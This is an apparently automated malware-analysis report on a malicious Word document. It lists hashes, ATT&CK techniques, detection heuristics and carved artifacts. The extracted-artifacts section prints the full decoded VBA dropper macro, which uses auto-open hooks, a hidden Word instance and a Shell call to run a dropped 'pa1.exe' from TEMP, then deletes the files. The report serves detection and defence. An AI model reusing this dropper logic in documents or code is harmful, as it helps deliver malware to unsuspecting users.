Office (OLE) malware analysis — malicious · cb9e5557976abe56

MALICIOUS

Office (OLE)

217.0 KB Created: 2015-10-01 12:22:00 Authoring application: Microsoft Office Word First seen: 2015-10-02

MD5: 305d5710acb3cf055c8fe3d2d332166f SHA-1: 87a185bcced4ee2792ece97cf79df16edfc40f61 SHA-256: cb9e5557976abe5694a55f6c80a394febf22ea3c3314afaf57f5fad07d5135c0

514 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer T1059 Command and Scripting Interpreter

The sample contains VBA macros with AutoOpen and Workbook_Open functions that trigger the execution of embedded content. The script explicitly calls `Shell` to execute a dropped PE file named 'pa1.exe' from the temporary directory. This indicates a downloader or initial payload delivery mechanism. The presence of an embedded PE executable and the use of VBA macros to execute it are strong indicators of malicious intent.

Heuristics 16

ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
Embedded PE executable critical OLE_EMBEDDED_EXE

MZ/PE header found inside document — possible embedded executable
Ole10Native package drops an auto-executable payload critical OFFICE_PACKAGE_RISKY_FILE

OLE Package displayName or fullPath ends in a directly auto-executable extension (a runnable binary or a script the default shell host runs on double-click). Embedding such a payload inside an Office document has no benign authoring use — it is a malware-delivery dropper.
VBA macros detected medium 7 related findings OLE_VBA_MACROS

Document contains VBA macro code
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
Shell (TEX)
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set appWord = CreateObject("Word.Application")
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
Sub Workbook_Open()
```
Auto_Open macro low OLE_VBA_AUTO

Auto_Open macro
Matched line in script
```
    Auto_Open
```
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Matched line in script
```
TMP = Environ$("TEMP") + "\"
```
Reference to LoadLibrary API high SC_STR_LOADLIBRARY

Reference to LoadLibrary API
Reference to GetProcAddress API high SC_STR_GETPROCADDRESS

Reference to GetProcAddress API
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1441 bytes
SHA-256: `c27fc9bda3a49b6b2d1b438c361519f587cb61a9e8fc76ed7ecab7a54c128099`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub qhdjkashdwd_Open() End Sub Sub asdhkjahajks_Open() BQJAHSD = "asdhjkajs kjdlkasj djahsdjkas" End Sub Sub AutoOpen() BQUYHDBHA = "aksd kjahsjkdhdkasjdl kasdjh askdg aksj d" Auto_Open End Sub Sub Manakai() On Error Resume Next TMP = Environ$("TEMP") + "\" TCA = TMP + "199.rtf" TCB = TMP + "200.rtf" TEX = TMP + "pa1.e" + "xe" SaveAsRTF (TCA) SaveAsRTF (TCB) Hey (2) Set appWord = CreateObject("Word.Application") appWord.Visible = False Set docWord = appWord.Documents.Open(TCA) Hey (2) Shell (TEX) Hey (1) appWord.Quit Set appWord = Nothing Kill TCA Kill TEX End Sub Sub Iriada() NKJASDSD = "askjd asjasj ldkadjkahaksj d" Manakai End Sub Sub Workbook_Open() HUQDHUIQW = "huqw dhqwui hksdjhqwuidhwqidhquwi d hqwduihauigsd" Iriada End Sub Sub Hey(Kalamana As Long) Dim Jhbhds As Long Jhbhds = Timer + Kalamana Do While Timer < Jhbhds DoEvents Loop End Sub Public Function SaveAsRTF(Name As String) ActiveDocument.SaveAs FileName:=Name, FileFormat:=wdFormatRTF End Function Sub Auto_Open() Iriada BHJQWDASD = "ajksdhj aksdasgdhjagskdj " End Sub
`embedded_office_0000304a.exe`	embedded-pe	Office MZ+PE at offset 0x304A	209846 bytes
SHA-256: `af97297834ec7867a9a1a36054a5f8e8da6b233424dcdbfac4b7c2e398102097`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved macro source contains an auto-exec entry point and execution/download terms.
`ole10native_00.bin`	ole-package	OLE Ole10Native stream: ObjectPool/_1505225505/Ole10Native	181440 bytes
SHA-256: `ba5a78326ebce322e9481e7b0b2ecf6bc2e581761fc8d9cc4378090d71c2c7f0`

Open this report in the interactive analyzer, or submit your own file for analysis.